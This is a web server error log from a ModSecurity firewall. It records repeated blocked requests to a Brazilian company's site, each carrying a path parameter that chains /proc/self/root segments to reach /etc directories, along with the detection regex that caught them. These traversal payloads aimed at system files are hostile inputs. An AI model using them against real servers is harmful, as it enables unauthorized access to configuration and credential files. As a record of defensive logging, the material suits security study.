[Mon Mar 16 19:20:37.359147 2026] [:error] [pid 10651:tid 140411607643904] [client 74.7.241.46:42024] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiCNbysWC90G-1nBrBqhQAAAZA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 19:20:45.304254 2026] [:error] [pid 10831:tid 140411557287680] [client 74.7.241.46:60564] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiCPY6lpbStxTqkSkuNJgAAAlY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 19:20:57.300364 2026] [:error] [pid 10831:tid 140411716749056] [client 74.7.243.203:35024] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiCSY6lpbStxTqkSkuNOAAAAkM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:21:01.725801 2026] [:error] [pid 10831:tid 140411683178240] [client 74.7.243.203:45154] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiCTY6lpbStxTqkSkuNQQAAAkc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:21:01.799215 2026] [:error] [pid 10831:tid 140411691570944] [client 74.7.241.46:60566] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiCTY6lpbStxTqkSkuNQgAAAkY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:21:27.782474 2026] [:error] [pid 29802:tid 140411540502272] [client 74.7.241.46:39458] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiCZ8_BxrYCr4hPDw8QVgAAAdg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:22:06.552355 2026] [:error] [pid 10772:tid 140411590858496] [client 74.7.243.203:58992] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiCjv9ocpUE4ed4uDwYFgAAAhI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:22:12.245865 2026] [:error] [pid 29507:tid 140411540502272] [client 74.7.243.203:37524] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiClEr9dMAiw-8KANNtzgAAARg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:22:27.461070 2026] [:error] [pid 21806:tid 140411616036608] [client 74.7.241.46:52726] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiCo9SswJuvopo3lOiGGgAAAI8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:22:43.762599 2026] [:error] [pid 29802:tid 140411574073088] [client 74.7.241.46:33886] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiCs8_BxrYCr4hPDw8QkQAAAdQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:22:48.205884 2026] [:error] [pid 21805:tid 140411624429312] [client 74.7.241.46:56816] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiCuLABkC4fWIHEf8EeIAAAAE4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:22:49.436453 2026] [:error] [pid 15568:tid 140411666392832] [client 74.7.241.46:58866] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiCuaQpVkWug9HeOt9YOQAAA0k"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:23:06.153104 2026] [:error] [pid 21805:tid 140411691570944] [client 74.7.243.203:52106] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiCyrABkC4fWIHEf8EeMwAAAEY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:23:25.118837 2026] [:error] [pid 29802:tid 140411616036608] [client 74.7.241.46:58868] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiC3c_BxrYCr4hPDw8QtgAAAc8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:23:26.472770 2026] [:error] [pid 29802:tid 140411658000128] [client 74.7.241.46:46088] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiC3s_BxrYCr4hPDw8QuAAAAco"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:23:32.578298 2026] [:error] [pid 15061:tid 140411557287680] [client 74.7.241.46:46094] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiC5KTCbgAP5jq5TehPmAAAAtY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:23:33.882774 2026] [:error] [pid 10772:tid 140411725141760] [client 74.7.241.46:49582] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiC5f9ocpUE4ed4uDwYKwAAAgI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:23:34.548383 2026] [:error] [pid 29507:tid 140411725141760] [client 74.7.243.203:54984] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiC5kr9dMAiw-8KANNt5wAAAQI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:23:37.291390 2026] [:error] [pid 15568:tid 140411641214720] [client 74.7.241.46:49584] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiC6aQpVkWug9HeOt9YQAAAA0w"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:23:46.131205 2026] [:error] [pid 21806:tid 140411741927168] [client 74.7.241.46:48312] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiC8tSswJuvopo3lOiGTQAAAIA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 19:23:48.514867 2026] [:error] [pid 10772:tid 140411708356352] [client 74.7.241.46:48316] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiC9P9ocpUE4ed4uDwYOAAAAgQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
